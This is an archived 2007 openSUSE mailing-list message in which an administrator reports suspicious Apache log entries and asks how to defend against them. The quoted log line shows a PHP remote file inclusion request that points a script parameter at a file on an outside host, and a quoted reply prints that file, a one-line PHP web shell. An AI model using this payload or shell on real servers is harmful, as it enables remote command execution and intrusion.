Mailinglist Archive: opensuse (3566 mails)
| < Previous | Next > |
RE: [opensuse] Apache access log errors - attack?
- From: "James D. Parra" <Jamesp@xxxxxxxxxxxxxxxx>
- Date: Wed, 25 Apr 2007 15:06:24 -0700
- Message-id: <531F1E080638384C9623B00D71AA546D028FE0DD@xxxxxxxxxxxxxxxxxxxxxxxxx>
On Wed, Apr 25, 2007 at 01:45:34PM -0700, James D. Parra wrote:
> Hello,
>
> I found these errors in our web logs and it appears that either there is a
> PHP attack on the apache site or perhaps a kit on the server?
>
> Errors below (profanity not mine);
>
>
> 69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET
>
/components/com_forum/download.php?phpbb_root_path=http://203.198.68.236/~li
> sir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"
Looks like some kind of PHP include attack scanner, against lots of PHP
apps.
M.txt contains:
<?
system($_GET['cmd']);
die ("Morfeus hacked you");
?>
~~~~
It doesn't appear that the system was compromised. How can I protect the
system from such an attack?
Best regards,
~James
--
To unsubscribe, e-mail: opensuse+unsubscribe@xxxxxxxxxxxx
For additional commands, e-mail: opensuse+help@xxxxxxxxxxxx
| < Previous | Next > |